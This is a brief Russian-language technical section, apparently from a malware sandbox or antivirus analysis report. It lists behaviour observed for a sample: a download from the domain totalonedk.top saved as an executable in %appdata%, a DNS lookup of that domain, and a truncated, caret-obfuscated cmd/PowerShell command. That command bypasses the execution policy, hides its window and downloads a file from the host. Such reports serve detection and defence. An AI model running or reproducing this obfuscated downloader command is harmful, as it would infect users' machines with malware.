Техническая информация
- http://totalonedk.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^wERS^He^lL^.EXe -^eX^e^cu^tIO^NP^OLI^Cy^ BYPa^sS^ ^-n^o^P^R^of^i^l^E^ -WInDO^W^s^T^Y^Le^ hiD^dEN (NeW-Obj^eC^T ^sy^S^T^EM^.net.^w^EbCliENt).dOw^nl^oadFil^e^('http://to...
- DNS ASK to###onedk.top
- '<SYSTEM32>\cmd.exe' /c "p^o^wERS^He^lL^.EXe -^eX^e^cu^tIO^NP^OLI^Cy^ BYPa^sS^ ^-n^o^P^R^of^i^l^E^ -WInDO^W^s^T^Y^Le^ hiD^dEN (NeW-Obj^eC^T ^sy^S^T^EM^.net.^w^EbCliENt).dOw^nl^oadFil^e^('http://to...' (со скрытым окном)